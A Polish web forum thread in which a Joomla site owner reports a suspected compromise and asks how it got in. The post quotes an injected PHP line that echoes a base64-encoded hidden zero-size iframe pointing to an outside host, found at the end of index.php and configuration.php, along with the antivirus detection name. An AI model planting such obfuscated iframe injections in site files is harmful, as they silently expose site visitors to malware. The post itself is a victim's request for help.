Wirus czy co to?
Wyniki 1 do 7 z 7

Temat: Wirus czy co to?

Widok drzewa

Poprzednia wiadomość Poprzednia wiadomość   Następna wiadomość Następna wiadomość
  1. #1
    Nowicjusz ostry awatar
    Dołączył
    01-10-2007
    Skąd
    Killarney, Irlandia
    Wpisy
    29
    Punkty
    14

    Domyślny Wirus czy co to?

    Chyba trafiło mi się włamanie. W jakiś sposób przybyła mi jedna linia w pliku index.php

    Kod PHP:
    echo base64_decode('PGlmcmFtZSBzcmM9Imh0dHA6Ly9pbi1pbi5pbi9pbi8iIHdpZHRoPTAgaGVpZ2h0PTAgc3R5bGU9ImhpZGRlbiIgZnJhbWVib3JkZXI9MCBtYXJnaW5oZWlnaHQ9MCBtYXJnaW53aWR0aD0wIHNjcm9sbGluZz1ubz4=');
    doGzip();
     
    ?> 
    Podczas przeglądania strony antywirusy alarmują o wykryciu
    Win32:socks-ae(wrm)

    Żadnych innych zmian nie stwierdziłem.

    O dziwo nie jest nic wykrywane podczas przeglądania Firefoxem, a jedynie w Explorerze. Wirusa łapie Avast, ale też nie na wszystkich komputerach.

    Używam Joomla! International Edition 1.0.15 stable i mam dołożonego najnowszego JoomFisha i Google Maps a serwis stoi na Home.pl więc raczej bezpiecznym serwerze.

    Sprawdziłem kilka innych moich stron i znalazłem identyczny wpis na witrynach postawionych również na serwerze Nazwa.pl więc to nie kwestia serwera. Wpis ten również czasem figurował w pliku configuration.php - zawsze na końcu pliku.
    To samo znalazłem również na stronie postawionej na Joomla! 1.5.1 - czysta Joomla bez żadnych dodatków.

    Macie jakieś pomysły, którędy to się dostało?
    Ostanio edytowane przez ostry : 21-06-2008 17:46

Reguły pisania

  • Nie możesz zakładać nowych tematów
  • Nie możesz dodawać wypowiedzi
  • Nie możesz dodawać załączników
  • Nie możesz poprawiać swoich postów
  •